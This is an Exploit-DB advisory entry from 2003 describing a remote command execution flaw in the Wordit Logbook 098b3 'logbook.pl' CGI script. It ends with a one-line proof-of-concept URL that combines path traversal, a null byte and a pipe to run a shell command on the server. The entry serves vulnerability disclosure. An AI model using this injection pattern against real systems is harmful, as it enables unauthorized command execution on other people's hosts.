Wordit Logbook 098b3 - Logbook.pl Remote Command Execution

EDB-ID:

22337

CVE:





Platform:

CGI

Date:

2003-03-07


source: https://www.securityfocus.com/bid/7043/info

A remote command execution vulnerability has been discovered in the Wordit Logbook application. This issue occurs due to insufficient sanitization of externally supplied data to the 'logbook.pl' script.

A remote attacker may exploit this condition to gain local, interactive access to the underlying host.

This vulnerability was reported to affect Wordit Logbook version 098b3 previous versions may also be affected.

www.example.com/logbook.pl?file=../../../../../../../bin/cat%20logbook.pl%00|